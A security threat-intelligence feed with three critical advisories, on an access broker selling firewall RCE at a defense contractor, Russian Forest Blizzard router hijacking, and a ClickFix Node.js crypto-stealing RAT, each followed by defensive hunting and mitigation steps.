CRITICALADVISORY3h ago
‼️🇺🇸 A well-known initial access broker is selling root-level remote code execution access to a...
An initial access broker is actively selling root-level RCE access to a compromised firewall at a major US aerospace and defense contractor ($20B+ valuation). The $1,000 price point indicates commodity-level access, suggesting multiple buyers may already have control. This represents direct compromise of critical infrastructure with immediate risk of lateral movement into defense supply chain networks.
Action required
Immediately hunt for indicators of compromise on all firewall management interfaces, VPNs, and network edge devices. Prioritize: review firewall logs for suspicious admin access, check for persistence mechanisms, audit all outbound connections from perimeter devices, and assume lateral movement has occurred until proven otherwise.
CRITICALADVISORY3h ago
Russian Forest Blizzard Hackers Hijack Home Routers for Global Spying
Russian military-linked Forest Blizzard actors have compromised over 5,000 SOHO routers globally since August 2025 to hijack DNS and intercept traffic. They're actively targeting Microsoft Outlook users across energy, IT, and telecom sectors, affecting 200 organizations including government agencies. Remote workers and any organization using compromised routers are at risk of credential theft and persistent surveillance.
Action required
Immediately audit all SOHO and remote access routers for unauthorized dnsmasq configurations or suspicious DNS settings. Check for any Outlook session compromises and force password resets for users accessing email from home networks. Query proxy and firewall logs for DNS traffic anomalies and unexpected MITM indicators.
MicrosoftMicrosoft Outlook
CRITICALADVISORY3h ago
New ClickFix Attack Uses Node.js Malware via Tor to Steal Crypto
ClickFix is a professional MaaS operation delivering Node.js-based RAT through fake CAPTCHA prompts on Windows systems. The malware uses Tor for C2, hides in memory, and targets crypto wallets after checking for 30+ security products. This is a high-volume social engineering attack with real theft operations already underway.
Action required
Hunt for Node.js processes spawned from browser or download directories, Tor traffic from endpoints, and gRPC connections to unknown hosts. Block known ClickFix C2 IPs and domains. Check for suspicious legitimate tool execution (Node.js, npm, curl) used as infection chains.
NetskopeWindows Defender
